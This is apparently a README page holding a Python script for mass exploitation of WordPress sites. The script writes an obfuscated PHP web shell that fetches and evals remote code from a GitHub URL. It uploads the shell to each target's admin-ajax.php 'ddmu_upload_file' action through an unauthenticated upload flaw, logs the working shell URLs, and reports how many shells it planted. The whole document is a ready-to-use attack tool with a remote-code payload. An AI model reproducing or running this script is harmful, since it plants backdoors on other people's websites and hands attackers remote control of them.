README.md
Rendering markdown...
import requests
import re
import time
targets_file = input("Enter Url List: ").strip()
shell_filename = "admin.php"
output_file = "shell.txt"
timeout_seconds = 25
headers = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
}
payload = """<?=/****/@null; /********/ /*******/ /********/@eval/****/("?>".file_get_contents/*******/("https://raw.githubusercontent.com/Professor6T9/Filemanager/refs/heads/main/FM.txt"));/**/?>"""
try:
with open(shell_filename, "w", encoding="utf-8") as shell_file:
shell_file.write(payload)
print(f"[+] Wrote custom PHP shell to: {shell_filename}")
except Exception as e:
print(f"[!] Failed to write shell file: {e}")
exit()
try:
with open(targets_file, "r", encoding="utf-8") as f:
targets = [line.strip().rstrip("/") for line in f if line.strip()]
except FileNotFoundError:
print(f"[!] Targets file '{targets_file}' not found.")
exit()
success_count = 0
with open(output_file, "w", encoding="utf-8") as out:
for target in targets:
upload_url = f"{target}/wp-admin/admin-ajax.php?action=ddmu_upload_file"
print(f"\n[+] Uploading to {upload_url}...")
try:
with open(shell_filename, "rb") as shell_file:
files = {
"uploadfile": (shell_filename, shell_file, "application/x-php")
}
response = requests.post(upload_url, files=files, headers=headers, timeout=timeout_seconds)
if response.status_code == 200:
match = re.search(r'(https?://[^\s"]+\.php)', response.text)
if match:
shell_url = match.group(1)
print(f"[+] Shell uploaded: {shell_url}")
out.write(shell_url + "\n")
success_count += 1
else:
print("[!] Upload succeeded but shell URL not found.")
else:
print(f"[!] Upload failed. Status: {response.status_code}")
print(response.text)
except Exception as e:
print(f"[!] Error uploading to {target}: {e}")
time.sleep(1)
print(f"\n[+] Done. {success_count} working shells saved in '{output_file}'.")